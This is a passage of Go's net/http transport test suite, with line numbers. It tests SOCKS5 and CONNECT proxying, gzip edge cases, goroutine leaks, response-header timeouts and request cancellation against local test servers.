1126 return
1127 }
1128 if _, err := io.ReadFull(s, buf[4:ipLen+6]); err != nil {
1129 t.Errorf("socks5 proxy address read: %v", err)
1130 return
1131 }
1132 ip := net.IP(buf[4 : ipLen+4])
1133 port := binary.BigEndian.Uint16(buf[ipLen+4 : ipLen+6])
1134 copy(buf[:3], []byte{5, 0, 0})
1135 if _, err := s.Write(buf[:ipLen+6]); err != nil {
1136 t.Errorf("socks5 proxy connect write: %v", err)
1137 return
1138 }
1139 ch <- fmt.Sprintf("proxy for %s:%d", ip, port)
1140
1141 // Implement proxying.
1142 targetHost := net.JoinHostPort(ip.String(), strconv.Itoa(int(port)))
1143 targetConn, err := net.Dial("tcp", targetHost)
1144 if err != nil {
1145 t.Errorf("net.Dial failed")
1146 return
1147 }
1148 go io.Copy(targetConn, s)
1149 io.Copy(s, targetConn) // Wait for the client to close the socket.
1150 targetConn.Close()
1151 }
1152
1153 pu, err := url.Parse("socks5://" + l.Addr().String())
1154 if err != nil {
1155 t.Fatal(err)
1156 }
1157
1158 sentinelHeader := "X-Sentinel"
1159 sentinelValue := "12345"
1160 h := HandlerFunc(func(w ResponseWriter, r *Request) {
1161 w.Header().Set(sentinelHeader, sentinelValue)
1162 })
1163 for _, useTLS := range []bool{false, true} {
1164 t.Run(fmt.Sprintf("useTLS=%v", useTLS), func(t *testing.T) {
1165 var ts *httptest.Server
1166 if useTLS {
1167 ts = httptest.NewTLSServer(h)
1168 } else {
1169 ts = httptest.NewServer(h)
1170 }
1171 go proxy(t)
1172 c := ts.Client()
1173 c.Transport.(*Transport).Proxy = ProxyURL(pu)
1174 r, err := c.Head(ts.URL)
1175 if err != nil {
1176 t.Fatal(err)
1177 }
1178 if r.Header.Get(sentinelHeader) != sentinelValue {
1179 t.Errorf("Failed to retrieve sentinel value")
1180 }
1181 var got string
1182 select {
1183 case got = <-ch:
1184 case <-time.After(5 * time.Second):
1185 t.Fatal("timeout connecting to socks5 proxy")
1186 }
1187 ts.Close()
1188 tsu, err := url.Parse(ts.URL)
1189 if err != nil {
1190 t.Fatal(err)
1191 }
1192 want := "proxy for " + tsu.Host
1193 if got != want {
1194 t.Errorf("got %q, want %q", got, want)
1195 }
1196 })
1197 }
1198 }
1199
1200 func TestTransportProxy(t *testing.T) {
1201 defer afterTest(t)
1202 testCases := []struct{ httpsSite, httpsProxy bool }{
1203 {false, false},
1204 {false, true},
1205 {true, false},
1206 {true, true},
1207 }
1208 for _, testCase := range testCases {
1209 httpsSite := testCase.httpsSite
1210 httpsProxy := testCase.httpsProxy
1211 t.Run(fmt.Sprintf("httpsSite=%v, httpsProxy=%v", httpsSite, httpsProxy), func(t *testing.T) {
1212 siteCh := make(chan *Request, 1)
1213 h1 := HandlerFunc(func(w ResponseWriter, r *Request) {
1214 siteCh <- r
1215 })
1216 proxyCh := make(chan *Request, 1)
1217 h2 := HandlerFunc(func(w ResponseWriter, r *Request) {
1218 proxyCh <- r
1219 // Implement an entire CONNECT proxy
1220 if r.Method == "CONNECT" {
1221 hijacker, ok := w.(Hijacker)
1222 if !ok {
1223 t.Errorf("hijack not allowed")
1224 return
1225 }
1226 clientConn, _, err := hijacker.Hijack()
1227 if err != nil {
1228 t.Errorf("hijacking failed")
1229 return
1230 }
1231 res := &Response{
1232 StatusCode: StatusOK,
1233 Proto: "HTTP/1.1",
1234 ProtoMajor: 1,
1235 ProtoMinor: 1,
1236 Header: make(Header),
1237 }
1238
1239 targetConn, err := net.Dial("tcp", r.URL.Host)
1240 if err != nil {
1241 t.Errorf("net.Dial(%q) failed: %v", r.URL.Host, err)
1242 return
1243 }
1244
1245 if err := res.Write(clientConn); err != nil {
1246 t.Errorf("Writing 200 OK failed: %v", err)
1247 return
1248 }
1249
1250 go io.Copy(targetConn, clientConn)
1251 go func() {
1252 io.Copy(clientConn, targetConn)
1253 targetConn.Close()
1254 }()
1255 }
1256 })
1257 var ts *httptest.Server
1258 if httpsSite {
1259 ts = httptest.NewTLSServer(h1)
1260 } else {
1261 ts = httptest.NewServer(h1)
1262 }
1263 var proxy *httptest.Server
1264 if httpsProxy {
1265 proxy = httptest.NewTLSServer(h2)
1266 } else {
1267 proxy = httptest.NewServer(h2)
1268 }
1269
1270 pu, err := url.Parse(proxy.URL)
1271 if err != nil {
1272 t.Fatal(err)
1273 }
1274
1275 // If neither server is HTTPS or both are, then c may be derived from either.
1276 // If only one server is HTTPS, c must be derived from that server in order
1277 // to ensure that it is configured to use the fake root CA from testcert.go.
1278 c := proxy.Client()
1279 if httpsSite {
1280 c = ts.Client()
1281 }
1282
1283 c.Transport.(*Transport).Proxy = ProxyURL(pu)
1284 if _, err := c.Head(ts.URL); err != nil {
1285 t.Error(err)
1286 }
1287 var got *Request
1288 select {
1289 case got = <-proxyCh:
1290 case <-time.After(5 * time.Second):
1291 t.Fatal("timeout connecting to http proxy")
1292 }
1293 c.Transport.(*Transport).CloseIdleConnections()
1294 ts.Close()
1295 proxy.Close()
1296 if httpsSite {
1297 // First message should be a CONNECT, asking for a socket to the real server,
1298 if got.Method != "CONNECT" {
1299 t.Errorf("Wrong method for secure proxying: %q", got.Method)
1300 }
1301 gotHost := got.URL.Host
1302 pu, err := url.Parse(ts.URL)
1303 if err != nil {
1304 t.Fatal("Invalid site URL")
1305 }
1306 if wantHost := pu.Host; gotHost != wantHost {
1307 t.Errorf("Got CONNECT host %q, want %q", gotHost, wantHost)
1308 }
1309
1310 // The next message on the channel should be from the site's server.
1311 next := <-siteCh
1312 if next.Method != "HEAD" {
1313 t.Errorf("Wrong method at destination: %s", next.Method)
1314 }
1315 if nextURL := next.URL.String(); nextURL != "/" {
1316 t.Errorf("Wrong URL at destination: %s", nextURL)
1317 }
1318 } else {
1319 if got.Method != "HEAD" {
1320 t.Errorf("Wrong method for destination: %q", got.Method)
1321 }
1322 gotURL := got.URL.String()
1323 wantURL := ts.URL + "/"
1324 if gotURL != wantURL {
1325 t.Errorf("Got URL %q, want %q", gotURL, wantURL)
1326 }
1327 }
1328 })
1329 }
1330 }
1331
1332 // Issue 16997: test transport dial preserves typed errors
1333 func TestTransportDialPreservesNetOpProxyError(t *testing.T) {
1334 defer afterTest(t)
1335
1336 var errDial = errors.New("some dial error")
1337
1338 tr := &Transport{
1339 Proxy: func(*Request) (*url.URL, error) {
1340 return url.Parse("http://proxy.fake.tld/")
1341 },
1342 Dial: func(string, string) (net.Conn, error) {
1343 return nil, errDial
1344 },
1345 }
1346 defer tr.CloseIdleConnections()
1347
1348 c := &Client{Transport: tr}
1349 req, _ := NewRequest("GET", "http://fake.tld", nil)
1350 res, err := c.Do(req)
1351 if err == nil {
1352 res.Body.Close()
1353 t.Fatal("wanted a non-nil error")
1354 }
1355
1356 uerr, ok := err.(*url.Error)
1357 if !ok {
1358 t.Fatalf("got %T, want *url.Error", err)
1359 }
1360 oe, ok := uerr.Err.(*net.OpError)
1361 if !ok {
1362 t.Fatalf("url.Error.Err = %T; want *net.OpError", uerr.Err)
1363 }
1364 want := &net.OpError{
1365 Op: "proxyconnect",
1366 Net: "tcp",
1367 Err: errDial, // original error, unwrapped.
1368 }
1369 if !reflect.DeepEqual(oe, want) {
1370 t.Errorf("Got error %#v; want %#v", oe, want)
1371 }
1372 }
1373
1374 // TestTransportGzipRecursive sends a gzip quine and checks that the
1375 // client gets the same value back. This is more cute than anything,
1376 // but checks that we don't recurse forever, and checks that
1377 // Content-Encoding is removed.
1378 func TestTransportGzipRecursive(t *testing.T) {
1379 defer afterTest(t)
1380 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1381 w.Header().Set("Content-Encoding", "gzip")
1382 w.Write(rgz)
1383 }))
1384 defer ts.Close()
1385
1386 c := ts.Client()
1387 res, err := c.Get(ts.URL)
1388 if err != nil {
1389 t.Fatal(err)
1390 }
1391 body, err := ioutil.ReadAll(res.Body)
1392 if err != nil {
1393 t.Fatal(err)
1394 }
1395 if !bytes.Equal(body, rgz) {
1396 t.Fatalf("Incorrect result from recursive gz:\nhave=%x\nwant=%x",
1397 body, rgz)
1398 }
1399 if g, e := res.Header.Get("Content-Encoding"), ""; g != e {
1400 t.Fatalf("Content-Encoding = %q; want %q", g, e)
1401 }
1402 }
1403
1404 // golang.org/issue/7750: request fails when server replies with
1405 // a short gzip body
1406 func TestTransportGzipShort(t *testing.T) {
1407 defer afterTest(t)
1408 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1409 w.Header().Set("Content-Encoding", "gzip")
1410 w.Write([]byte{0x1f, 0x8b})
1411 }))
1412 defer ts.Close()
1413
1414 c := ts.Client()
1415 res, err := c.Get(ts.URL)
1416 if err != nil {
1417 t.Fatal(err)
1418 }
1419 defer res.Body.Close()
1420 _, err = ioutil.ReadAll(res.Body)
1421 if err == nil {
1422 t.Fatal("Expect an error from reading a body.")
1423 }
1424 if err != io.ErrUnexpectedEOF {
1425 t.Errorf("ReadAll error = %v; want io.ErrUnexpectedEOF", err)
1426 }
1427 }
1428
1429 // Wait until number of goroutines is no greater than nmax, or time out.
1430 func waitNumGoroutine(nmax int) int {
1431 nfinal := runtime.NumGoroutine()
1432 for ntries := 10; ntries > 0 && nfinal > nmax; ntries-- {
1433 time.Sleep(50 * time.Millisecond)
1434 runtime.GC()
1435 nfinal = runtime.NumGoroutine()
1436 }
1437 return nfinal
1438 }
1439
1440 // tests that persistent goroutine connections shut down when no longer desired.
1441 func TestTransportPersistConnLeak(t *testing.T) {
1442 // Not parallel: counts goroutines
1443 defer afterTest(t)
1444
1445 const numReq = 25
1446 gotReqCh := make(chan bool, numReq)
1447 unblockCh := make(chan bool, numReq)
1448 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1449 gotReqCh <- true
1450 <-unblockCh
1451 w.Header().Set("Content-Length", "0")
1452 w.WriteHeader(204)
1453 }))
1454 defer ts.Close()
1455 c := ts.Client()
1456 tr := c.Transport.(*Transport)
1457
1458 n0 := runtime.NumGoroutine()
1459
1460 didReqCh := make(chan bool, numReq)
1461 failed := make(chan bool, numReq)
1462 for i := 0; i < numReq; i++ {
1463 go func() {
1464 res, err := c.Get(ts.URL)
1465 didReqCh <- true
1466 if err != nil {
1467 t.Errorf("client fetch error: %v", err)
1468 failed <- true
1469 return
1470 }
1471 res.Body.Close()
1472 }()
1473 }
1474
1475 // Wait for all goroutines to be stuck in the Handler.
1476 for i := 0; i < numReq; i++ {
1477 select {
1478 case <-gotReqCh:
1479 // ok
1480 case <-failed:
1481 close(unblockCh)
1482 return
1483 }
1484 }
1485
1486 nhigh := runtime.NumGoroutine()
1487
1488 // Tell all handlers to unblock and reply.
1489 for i := 0; i < numReq; i++ {
1490 unblockCh <- true
1491 }
1492
1493 // Wait for all HTTP clients to be done.
1494 for i := 0; i < numReq; i++ {
1495 <-didReqCh
1496 }
1497
1498 tr.CloseIdleConnections()
1499 nfinal := waitNumGoroutine(n0 + 5)
1500
1501 growth := nfinal - n0
1502
1503 // We expect 0 or 1 extra goroutine, empirically. Allow up to 5.
1504 // Previously we were leaking one per numReq.
1505 if int(growth) > 5 {
1506 t.Logf("goroutine growth: %d -> %d -> %d (delta: %d)", n0, nhigh, nfinal, growth)
1507 t.Error("too many new goroutines")
1508 }
1509 }
1510
1511 // golang.org/issue/4531: Transport leaks goroutines when
1512 // request.ContentLength is explicitly short
1513 func TestTransportPersistConnLeakShortBody(t *testing.T) {
1514 // Not parallel: measures goroutines.
1515 defer afterTest(t)
1516 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1517 }))
1518 defer ts.Close()
1519 c := ts.Client()
1520 tr := c.Transport.(*Transport)
1521
1522 n0 := runtime.NumGoroutine()
1523 body := []byte("Hello")
1524 for i := 0; i < 20; i++ {
1525 req, err := NewRequest("POST", ts.URL, bytes.NewReader(body))
1526 if err != nil {
1527 t.Fatal(err)
1528 }
1529 req.ContentLength = int64(len(body) - 2) // explicitly short
1530 _, err = c.Do(req)
1531 if err == nil {
1532 t.Fatal("Expect an error from writing too long of a body.")
1533 }
1534 }
1535 nhigh := runtime.NumGoroutine()
1536 tr.CloseIdleConnections()
1537 nfinal := waitNumGoroutine(n0 + 5)
1538
1539 growth := nfinal - n0
1540
1541 // We expect 0 or 1 extra goroutine, empirically. Allow up to 5.
1542 // Previously we were leaking one per numReq.
1543 t.Logf("goroutine growth: %d -> %d -> %d (delta: %d)", n0, nhigh, nfinal, growth)
1544 if int(growth) > 5 {
1545 t.Error("too many new goroutines")
1546 }
1547 }
1548
1549 // This used to crash; https://golang.org/issue/3266
1550 func TestTransportIdleConnCrash(t *testing.T) {
1551 defer afterTest(t)
1552 var tr *Transport
1553
1554 unblockCh := make(chan bool, 1)
1555 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1556 <-unblockCh
1557 tr.CloseIdleConnections()
1558 }))
1559 defer ts.Close()
1560 c := ts.Client()
1561 tr = c.Transport.(*Transport)
1562
1563 didreq := make(chan bool)
1564 go func() {
1565 res, err := c.Get(ts.URL)
1566 if err != nil {
1567 t.Error(err)
1568 } else {
1569 res.Body.Close() // returns idle conn
1570 }
1571 didreq <- true
1572 }()
1573 unblockCh <- true
1574 <-didreq
1575 }
1576
1577 // Test that the transport doesn't close the TCP connection early,
1578 // before the response body has been read. This was a regression
1579 // which sadly lacked a triggering test. The large response body made
1580 // the old race easier to trigger.
1581 func TestIssue3644(t *testing.T) {
1582 defer afterTest(t)
1583 const numFoos = 5000
1584 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1585 w.Header().Set("Connection", "close")
1586 for i := 0; i < numFoos; i++ {
1587 w.Write([]byte("foo "))
1588 }
1589 }))
1590 defer ts.Close()
1591 c := ts.Client()
1592 res, err := c.Get(ts.URL)
1593 if err != nil {
1594 t.Fatal(err)
1595 }
1596 defer res.Body.Close()
1597 bs, err := ioutil.ReadAll(res.Body)
1598 if err != nil {
1599 t.Fatal(err)
1600 }
1601 if len(bs) != numFoos*len("foo ") {
1602 t.Errorf("unexpected response length")
1603 }
1604 }
1605
1606 // Test that a client receives a server's reply, even if the server doesn't read
1607 // the entire request body.
1608 func TestIssue3595(t *testing.T) {
1609 setParallel(t)
1610 defer afterTest(t)
1611 const deniedMsg = "sorry, denied."
1612 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1613 Error(w, deniedMsg, StatusUnauthorized)
1614 }))
1615 defer ts.Close()
1616 c := ts.Client()
1617 res, err := c.Post(ts.URL, "application/octet-stream", neverEnding('a'))
1618 if err != nil {
1619 t.Errorf("Post: %v", err)
1620 return
1621 }
1622 got, err := ioutil.ReadAll(res.Body)
1623 if err != nil {
1624 t.Fatalf("Body ReadAll: %v", err)
1625 }
1626 if !strings.Contains(string(got), deniedMsg) {
1627 t.Errorf("Known bug: response %q does not contain %q", got, deniedMsg)
1628 }
1629 }
1630
1631 // From https://golang.org/issue/4454 ,
1632 // "client fails to handle requests with no body and chunked encoding"
1633 func TestChunkedNoContent(t *testing.T) {
1634 defer afterTest(t)
1635 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1636 w.WriteHeader(StatusNoContent)
1637 }))
1638 defer ts.Close()
1639
1640 c := ts.Client()
1641 for _, closeBody := range []bool{true, false} {
1642 const n = 4
1643 for i := 1; i <= n; i++ {
1644 res, err := c.Get(ts.URL)
1645 if err != nil {
1646 t.Errorf("closingBody=%v, req %d/%d: %v", closeBody, i, n, err)
1647 } else {
1648 if closeBody {
1649 res.Body.Close()
1650 }
1651 }
1652 }
1653 }
1654 }
1655
1656 func TestTransportConcurrency(t *testing.T) {
1657 // Not parallel: uses global test hooks.
1658 defer afterTest(t)
1659 maxProcs, numReqs := 16, 500
1660 if testing.Short() {
1661 maxProcs, numReqs = 4, 50
1662 }
1663 defer runtime.GOMAXPROCS(runtime.GOMAXPROCS(maxProcs))
1664 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1665 fmt.Fprintf(w, "%v", r.FormValue("echo"))
1666 }))
1667 defer ts.Close()
1668
1669 var wg sync.WaitGroup
1670 wg.Add(numReqs)
1671
1672 // Due to the Transport's "socket late binding" (see
1673 // idleConnCh in transport.go), the numReqs HTTP requests
1674 // below can finish with a dial still outstanding. To keep
1675 // the leak checker happy, keep track of pending dials and
1676 // wait for them to finish (and be closed or returned to the
1677 // idle pool) before we close idle connections.
1678 SetPendingDialHooks(func() { wg.Add(1) }, wg.Done)
1679 defer SetPendingDialHooks(nil, nil)
1680
1681 c := ts.Client()
1682 reqs := make(chan string)
1683 defer close(reqs)
1684
1685 for i := 0; i < maxProcs*2; i++ {
1686 go func() {
1687 for req := range reqs {
1688 res, err := c.Get(ts.URL + "/?echo=" + req)
1689 if err != nil {
1690 t.Errorf("error on req %s: %v", req, err)
1691 wg.Done()
1692 continue
1693 }
1694 all, err := ioutil.ReadAll(res.Body)
1695 if err != nil {
1696 t.Errorf("read error on req %s: %v", req, err)
1697 wg.Done()
1698 continue
1699 }
1700 if string(all) != req {
1701 t.Errorf("body of req %s = %q; want %q", req, all, req)
1702 }
1703 res.Body.Close()
1704 wg.Done()
1705 }
1706 }()
1707 }
1708 for i := 0; i < numReqs; i++ {
1709 reqs <- fmt.Sprintf("request-%d", i)
1710 }
1711 wg.Wait()
1712 }
1713
1714 func TestIssue4191_InfiniteGetTimeout(t *testing.T) {
1715 setParallel(t)
1716 defer afterTest(t)
1717 const debug = false
1718 mux := NewServeMux()
1719 mux.HandleFunc("/get", func(w ResponseWriter, r *Request) {
1720 io.Copy(w, neverEnding('a'))
1721 })
1722 ts := httptest.NewServer(mux)
1723 defer ts.Close()
1724 timeout := 100 * time.Millisecond
1725
1726 c := ts.Client()
1727 c.Transport.(*Transport).Dial = func(n, addr string) (net.Conn, error) {
1728 conn, err := net.Dial(n, addr)
1729 if err != nil {
1730 return nil, err
1731 }
1732 conn.SetDeadline(time.Now().Add(timeout))
1733 if debug {
1734 conn = NewLoggingConn("client", conn)
1735 }
1736 return conn, nil
1737 }
1738
1739 getFailed := false
1740 nRuns := 5
1741 if testing.Short() {
1742 nRuns = 1
1743 }
1744 for i := 0; i < nRuns; i++ {
1745 if debug {
1746 println("run", i+1, "of", nRuns)
1747 }
1748 sres, err := c.Get(ts.URL + "/get")
1749 if err != nil {
1750 if !getFailed {
1751 // Make the timeout longer, once.
1752 getFailed = true
1753 t.Logf("increasing timeout")
1754 i--
1755 timeout *= 10
1756 continue
1757 }
1758 t.Errorf("Error issuing GET: %v", err)
1759 break
1760 }
1761 _, err = io.Copy(ioutil.Discard, sres.Body)
1762 if err == nil {
1763 t.Errorf("Unexpected successful copy")
1764 break
1765 }
1766 }
1767 if debug {
1768 println("tests complete; waiting for handlers to finish")
1769 }
1770 }
1771
1772 func TestIssue4191_InfiniteGetToPutTimeout(t *testing.T) {
1773 setParallel(t)
1774 defer afterTest(t)
1775 const debug = false
1776 mux := NewServeMux()
1777 mux.HandleFunc("/get", func(w ResponseWriter, r *Request) {
1778 io.Copy(w, neverEnding('a'))
1779 })
1780 mux.HandleFunc("/put", func(w ResponseWriter, r *Request) {
1781 defer r.Body.Close()
1782 io.Copy(ioutil.Discard, r.Body)
1783 })
1784 ts := httptest.NewServer(mux)
1785 timeout := 100 * time.Millisecond
1786
1787 c := ts.Client()
1788 c.Transport.(*Transport).Dial = func(n, addr string) (net.Conn, error) {
1789 conn, err := net.Dial(n, addr)
1790 if err != nil {
1791 return nil, err
1792 }
1793 conn.SetDeadline(time.Now().Add(timeout))
1794 if debug {
1795 conn = NewLoggingConn("client", conn)
1796 }
1797 return conn, nil
1798 }
1799
1800 getFailed := false
1801 nRuns := 5
1802 if testing.Short() {
1803 nRuns = 1
1804 }
1805 for i := 0; i < nRuns; i++ {
1806 if debug {
1807 println("run", i+1, "of", nRuns)
1808 }
1809 sres, err := c.Get(ts.URL + "/get")
1810 if err != nil {
1811 if !getFailed {
1812 // Make the timeout longer, once.
1813 getFailed = true
1814 t.Logf("increasing timeout")
1815 i--
1816 timeout *= 10
1817 continue
1818 }
1819 t.Errorf("Error issuing GET: %v", err)
1820 break
1821 }
1822 req, _ := NewRequest("PUT", ts.URL+"/put", sres.Body)
1823 _, err = c.Do(req)
1824 if err == nil {
1825 sres.Body.Close()
1826 t.Errorf("Unexpected successful PUT")
1827 break
1828 }
1829 sres.Body.Close()
1830 }
1831 if debug {
1832 println("tests complete; waiting for handlers to finish")
1833 }
1834 ts.Close()
1835 }
1836
1837 func TestTransportResponseHeaderTimeout(t *testing.T) {
1838 setParallel(t)
1839 defer afterTest(t)
1840 if testing.Short() {
1841 t.Skip("skipping timeout test in -short mode")
1842 }
1843 inHandler := make(chan bool, 1)
1844 mux := NewServeMux()
1845 mux.HandleFunc("/fast", func(w ResponseWriter, r *Request) {
1846 inHandler <- true
1847 })
1848 mux.HandleFunc("/slow", func(w ResponseWriter, r *Request) {
1849 inHandler <- true
1850 time.Sleep(2 * time.Second)
1851 })
1852 ts := httptest.NewServer(mux)
1853 defer ts.Close()
1854
1855 c := ts.Client()
1856 c.Transport.(*Transport).ResponseHeaderTimeout = 500 * time.Millisecond
1857
1858 tests := []struct {
1859 path string
1860 want int
1861 wantErr string
1862 }{
1863 {path: "/fast", want: 200},
1864 {path: "/slow", wantErr: "timeout awaiting response headers"},
1865 {path: "/fast", want: 200},
1866 }
1867 for i, tt := range tests {
1868 req, _ := NewRequest("GET", ts.URL+tt.path, nil)
1869 req = req.WithT(t)
1870 res, err := c.Do(req)
1871 select {
1872 case <-inHandler:
1873 case <-time.After(5 * time.Second):
1874 t.Errorf("never entered handler for test index %d, %s", i, tt.path)
1875 continue
1876 }
1877 if err != nil {
1878 uerr, ok := err.(*url.Error)
1879 if !ok {
1880 t.Errorf("error is not an url.Error; got: %#v", err)
1881 continue
1882 }
1883 nerr, ok := uerr.Err.(net.Error)
1884 if !ok {
1885 t.Errorf("error does not satisfy net.Error interface; got: %#v", err)
1886 continue
1887 }
1888 if !nerr.Timeout() {
1889 t.Errorf("want timeout error; got: %q", nerr)
1890 continue
1891 }
1892 if strings.Contains(err.Error(), tt.wantErr) {
1893 continue
1894 }
1895 t.Errorf("%d. unexpected error: %v", i, err)
1896 continue
1897 }
1898 if tt.wantErr != "" {
1899 t.Errorf("%d. no error. expected error: %v", i, tt.wantErr)
1900 continue
1901 }
1902 if res.StatusCode != tt.want {
1903 t.Errorf("%d for path %q status = %d; want %d", i, tt.path, res.StatusCode, tt.want)
1904 }
1905 }
1906 }
1907
1908 func TestTransportCancelRequest(t *testing.T) {
1909 setParallel(t)
1910 defer afterTest(t)
1911 if testing.Short() {
1912 t.Skip("skipping test in -short mode")
1913 }
1914 unblockc := make(chan bool)
1915 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
1916 fmt.Fprintf(w, "Hello")
1917 w.(Flusher).Flush() // send headers and some body
1918 <-unblockc
1919 }))
1920 defer ts.Close()
1921 defer close(unblockc)
1922
1923 c := ts.Client()
1924 tr := c.Transport.(*Transport)
1925
1926 req, _ := NewRequest("GET", ts.URL, nil)
1927 res, err := c.Do(req)
1928 if err != nil {
1929 t.Fatal(err)
1930 }
1931 go func() {
1932 time.Sleep(1 * time.Second)
1933 tr.CancelRequest(req)
1934 }()
1935 t0 := time.Now()
1936 body, err := ioutil.ReadAll(res.Body)
1937 d := time.Since(t0)
1938
1939 if err != ExportErrRequestCanceled {
1940 t.Errorf("Body.Read error = %v; want errRequestCanceled", err)
1941 }
1942 if string(body) != "Hello" {
1943 t.Errorf("Body = %q; want Hello", body)
1944 }
1945 if d < 500*time.Millisecond {
1946 t.Errorf("expected ~1 second delay; got %v", d)
1947 }
1948 // Verify no outstanding requests after readLoop/writeLoop
1949 // goroutines shut down.
1950 for tries := 5; tries > 0; tries-- {
1951 n := tr.NumPendingRequestsForTesting()
1952 if n == 0 {
1953 break
1954 }
1955 time.Sleep(100 * time.Millisecond)
1956 if tries == 1 {
1957 t.Errorf("pending requests = %d; want 0", n)
1958 }
1959 }
1960 }
1961
1962 func TestTransportCancelRequestInDial(t *testing.T) {
1963 defer afterTest(t)
1964 if testing.Short() {
1965 t.Skip("skipping test in -short mode")
1966 }
1967 var logbuf bytes.Buffer
1968 eventLog := log.New(&logbuf, "", 0)
1969
1970 unblockDial := make(chan bool)
1971 defer close(unblockDial)
1972
1973 inDial := make(chan bool)
1974 tr := &Transport{
1975 Dial: func(network, addr string) (net.Conn, error) {
1976 eventLog.Println("dial: blocking")
1977 inDial <- true
1978 <-unblockDial
1979 return nil, errors.New("nope")
1980 },
1981 }
1982 cl := &Client{Transport: tr}
1983 gotres := make(chan bool)
1984 req, _ := NewRequest("GET", "http://something.no-network.tld/", nil)
1985 go func() {
1986 _, err := cl.Do(req)
1987 eventLog.Printf("Get = %v", err)
1988 gotres <- true
1989 }()
1990
1991 select {
1992 case <-inDial:
1993 case <-time.After(5 * time.Second):
1994 t.Fatal("timeout; never saw blocking dial")
1995 }
1996
1997 eventLog.Printf("canceling")
1998 tr.CancelRequest(req)
1999 tr.CancelRequest(req) // used to panic on second call
2000
2001 select {
2002 case <-gotres:
2003 case <-time.After(5 * time.Second):
2004 panic("hang. events are: " + logbuf.String())
2005 }
2006
2007 got := logbuf.String()
2008 want := `dial: blocking
2009 canceling
2010 Get = Get http://something.no-network.tld/: net/http: request canceled while waiting for connection
2011 `
2012 if got != want {
2013 t.Errorf("Got events:\n%s\nWant:\n%s", got, want)
2014 }
2015 }
2016
2017 func TestCancelRequestWithChannel(t *testing.T) {
2018 setParallel(t)
2019 defer afterTest(t)
2020 if testing.Short() {
2021 t.Skip("skipping test in -short mode")
2022 }
2023 unblockc := make(chan bool)
2024 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2025 fmt.Fprintf(w, "Hello")
2026 w.(Flusher).Flush() // send headers and some body
2027 <-unblockc
2028 }))
2029 defer ts.Close()
2030 defer close(unblockc)
2031
2032 c := ts.Client()
2033 tr := c.Transport.(*Transport)
2034
2035 req, _ := NewRequest("GET", ts.URL, nil)
2036 ch := make(chan struct{})
2037 req.Cancel = ch
2038
2039 res, err := c.Do(req)
2040 if err != nil {
2041 t.Fatal(err)
2042 }
2043 go func() {
2044 time.Sleep(1 * time.Second)
2045 close(ch)
2046 }()
2047 t0 := time.Now()
2048 body, err := ioutil.ReadAll(res.Body)
2049 d := time.Since(t0)
2050
2051 if err != ExportErrRequestCanceled {
2052 t.Errorf("Body.Read error = %v; want errRequestCanceled", err)
2053 }
2054 if string(body) != "Hello" {
2055 t.Errorf("Body = %q; want Hello", body)
2056 }
2057 if d < 500*time.Millisecond {
2058 t.Errorf("expected ~1 second delay; got %v", d)
2059 }
2060 // Verify no outstanding requests after readLoop/writeLoop
2061 // goroutines shut down.
2062 for tries := 5; tries > 0; tries-- {
2063 n := tr.NumPendingRequestsForTesting()
2064 if n == 0 {
2065 break
2066 }
2067 time.Sleep(100 * time.Millisecond)
2068 if tries == 1 {
2069 t.Errorf("pending requests = %d; want 0", n)
2070 }
2071 }
2072 }
2073
2074 func TestCancelRequestWithChannelBeforeDo_Cancel(t *testing.T) {
2075 testCancelRequestWithChannelBeforeDo(t, false)
2076 }
2077 func TestCancelRequestWithChannelBeforeDo_Context(t *testing.T) {
2078 testCancelRequestWithChannelBeforeDo(t, true)
2079 }
2080 func testCancelRequestWithChannelBeforeDo(t *testing.T, withCtx bool) {
2081 setParallel(t)
2082 defer afterTest(t)
2083 unblockc := make(chan bool)
2084 ts := httptest.NewServer(HandlerFunc(func(w ResponseWriter, r *Request) {
2085 <-unblockc
2086 }))
2087 defer ts.Close()
2088 defer close(unblockc)
2089
2090 c := ts.Client()
2091
2092 req, _ := NewRequest("GET", ts.URL, nil)
2093 if withCtx {
2094 ctx, cancel := context.WithCancel(context.Background())
2095 cancel()
2096 req = req.WithContext(ctx)
2097 } else {
2098 ch := make(chan struct{})
2099 req.Cancel = ch
2100 close(ch)
2101 }
2102
2103 _, err := c.Do(req)
2104 if ue, ok := err.(*url.Error); ok {
2105 err = ue.Err
2106 }
2107 if withCtx {
2108 if err != context.Canceled {
2109 t.Errorf("Do error = %v; want %v", err, context.Canceled)
2110 }
2111 } else {
2112 if err == nil || !strings.Contains(err.Error(), "canceled") {
2113 t.Errorf("Do error = %v; want cancelation", err)
2114 }
2115 }
2116 }
2117
2118 // Issue 11020. The returned error message should be errRequestCanceled
2119 func TestTransportCancelBeforeResponseHeaders(t *testing.T) {
2120 defer afterTest(t)
2121
2122 serverConnCh := make(chan net.Conn, 1)
2123 tr := &Transport{
2124 Dial: func(network, addr string) (net.Conn, error) {
2125 cc, sc := net.Pipe()
2126 serverConnCh <- sc
2127 return cc, nil
2128 },
2129 }
2130 defer tr.CloseIdleConnections()
2131 errc := make(chan error, 1)
2132 req, _ := NewRequest("GET", "http://example.com/", nil)
2133 go func() {
2134 _, err := tr.RoundTrip(req)
2135 errc <- err
2136 }()
2137
2138 sc := <-serverConnCh
2139 verb := make([]byte, 3)
2140 if _, err := io.ReadFull(sc, verb); err != nil {
2141 t.Errorf("Error reading HTTP verb from server: %v", err)
2142 }
2143 if string(verb) != "GET" {
2144 t.Errorf("server received %q; want GET", verb)
2145 }
2146 defer sc.Close()
2147
2148 tr.CancelRequest(req)
2149
2150 err := <-errc
2151 if err == nil {
2152 t.Fatalf("unexpected success from RoundTrip")
2153 }
2154 if err != ExportErrRequestCanceled {
2155 t.Errorf("RoundTrip error = %v; want ExportErrRequestCanceled", err)
2156 }
2157 }
2158
2159 // golang.org/issue/3672 -- Client can't close HTTP stream
2160 // Calling Close on a Response.Body used to just read until EOF.
2161 // Now it actually closes the TCP connection.
